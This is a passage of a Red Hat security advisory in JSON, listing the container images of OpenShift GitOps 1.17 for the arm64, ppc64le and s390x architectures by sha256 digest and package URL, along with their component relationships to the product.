"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3Ae5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3A4b3765fa97fcf85c39a17e88712fdd1bfa158a8677f714e862d35cadedeeda62?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3A1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:b6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3Ab6c7ce8543542a2943498c7cc5f3be103493d7c8a3055dfbfe4b468285542cc7?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:c7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285_arm64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Ac7b52016e71fc0b1118e0253840f261c0d21a64a9135b5f7971cb6dab3dcc285?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3A8fd8642fc3d8133141119dd425bc78bb57be51360cb3c28cc1b54968e79b6b55?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6_arm64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3A47c66c140471b49a4e95bc25788d261e8951eeec2a55ea5d07b8a3670a393ef6?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:ac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3Aac34135ee63849e8620c33cfdd619f810d87d07d2ba9ca35c0932bdbf1e1d6cc?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:a85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459_arm64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3Aa85eb07d72178b495f77ed1566f3ec72969fdc8acf83b2e847e7c393739ee459?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A87add4524478a000579bc7caa048946e2bf2ca65886da0dd032c4be455d78fc8?arch=arm64\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "arm64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3Aa0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3A12e0ab863663d47e2a483839e000eb8fa624bd5766bf706213db295a0e00815f?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3Aa182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3A1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3A9ef69c345cfa9198e4d56366946741f83413e0cc1e63a95104a5dd476805e78d?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3Aa85ac1be1b1879662d4cec1033d6916f4c142221282aff09113383ba236a2bdb?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3A64d8c57090f88ebd3671a390e1b1956f799cda24c85e978d8f937f302ceb40f5?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3A0c32ee1204ce384bf91892ddc887e9eff7059242f387c614ca6049c9c0392c4e?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3A689a9a102c8087e3adf3646dc686647cb6197df3524cab1db6ba94e618c55282?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A36ce4a97fb4a83ee3aec72957c2bb028f35e5adc3c936c2786970ff7562c0783?arch=ppc64le\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256%3Aa03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel8@sha256:99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256%3A99403da3c050737dbda083bb11d413b317fa2cb7143ee4ce0125fb6ad44ca184?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-agent-rhel8@sha256%3A1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-extensions-rhel8@sha256%3A5109b457be26c5d03311c5fa52f43d4db7606ecae58360a479fa8562d808fadc?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/argocd-rhel9@sha256:b9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256%3Ab9125f40d94e6aa05df7814a23d47e904ccee9f5204ebcfd994f9432b3feb0fb?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/console-plugin-rhel8@sha256:a4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256%3Aa4b698bd79e935b61cfc559ac512fd1e634d6f347a6afe335161de3325a164ab?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/dex-rhel8@sha256:439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256%3A439fef0be72eb98010e262668a420425c4b74924c3a929dcbac987de1341d8e6?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8@sha256:1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256%3A1cd978e7d7fbf499996c6f2da908ee77a07f5fe229b4424b7f48ee94f142e4ab?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator@sha256:5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256%3A5cdb2206120407d94f409ebb2639c5b61679df14be99d60db25703ab9f9b3ef4?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"product": {
"name": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"product_id": "registry.redhat.io/openshift-gitops-1/must-gather-rhel8@sha256:2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256%3A2bfd51f1bee622faddee3acd58f372c0b3b4db406ffabeae84677b091e364a53?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a03e72ceb733c34a4788d294d14f0e4ee0e03e2b509a4f7e78f4abebe4d8224a_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:a0686e82d2d203e6af794691ba50101aa9a1fb049523cc50aa0a870bdcae4113_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:c28cabf7a7e417448c23bed8741d86cec7a60b70598672a8766279ea67a7d570_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8@sha256:e5c9119e2417f4085ad78a71653ec1653096923672d03b4d8a384334dca20a90_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1dd0c50f25497541f3b4e35b802ed9110987870d38960bda7d530436f7875e73_arm64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:1f35c7ec22e6cb4c4d1e5da664a4b4fdd6e4b9fe98c93e9f5f6e9b16dcc12ff5_s390x",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a182f8ec61c4dc5f32a87750e28b792d0ff3b666ae9d67a39ac9dc6e2bc84e5e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64 as a component of Red Hat OpenShift GitOps 1.17",
"product_id": "Red Hat OpenShift GitOps 1.17:registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64"
},
"product_reference": "registry.redhat.io/openshift-gitops-1/argocd-agent-rhel8@sha256:a73d1a81029d39de7900b5c52f22bcb57188d973391c4a2f81bbde612b9185fb_amd64",
"relates_to_product_reference": "Red Hat OpenShift GitOps 1.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-gitops-1/argocd-extensions-rhel8@sha256:1eb401fa44278a8558d45167b3d2507fac77521a2fb322bb66012d4cdfec87b6_ppc64le as a component of Red Hat OpenShift GitOps 1.17",
